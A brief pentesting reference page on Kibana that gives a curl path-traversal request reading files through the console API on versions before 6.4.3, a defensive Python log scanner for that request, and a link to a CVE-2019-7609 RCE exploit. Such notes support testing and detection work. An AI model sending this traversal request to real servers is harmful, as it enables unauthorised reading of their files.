# Kibana Pentesting

Kibana is a proprietary data visualization dashboard for Elasticsearch. Its default port is 5601.

### Vulnerabilities

#### Local File Inclusion (LFI) Version < 6.4.3 & 5.6.13

```
# The URL is quoted so the shell does not treat "&" as a control operator.
curl "http://<target-ip>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../root.txt"
```
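
A defender-side check for the request shape above, as an added example that is not part of the original page: it scans access-log lines for requests to `/api/console/api_server` whose `apis` parameter contains `..` path segments, including percent-encoded and double-encoded forms. The combined-style log format, the sample lines and the benign value `es_6_0` are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter taken from the curl request on this page.
ENDPOINT = "/api/console/api_server"
PARAM = "apis"
# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_console_traversal(target):
    """True if the target hits the console API with '..' segments in `apis`."""
    parts = urlsplit(target)
    if fully_unquote(parts.path).rstrip("/") != ENDPOINT:
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        segments = fully_unquote(value).replace("\\", "/").split("/")
        if ".." in segments:
            return True
    return False


def scan(lines):
    """Return (line_number, request_target) for every suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_console_traversal(match.group("target")):
            hits.append((number, match.group("target")))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../tmp/x HTTP/1.1" 500 60',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /api/console/api_server?apis=%252e%252e%252f%252e%252e%252fetc%252fhosts HTTP/1.1" 500 60',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /app/kibana?q=../x HTTP/1.1" 200 900',
]
```

`scan(SAMPLE_LOG)` flags the second and third lines only; the fourth contains `../` but does not target the console API endpoint.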

#### Remote Code Execution (RCE) Version < 6.6.0

Reference: <https://github.com/mpgn/CVE-2019-7609>
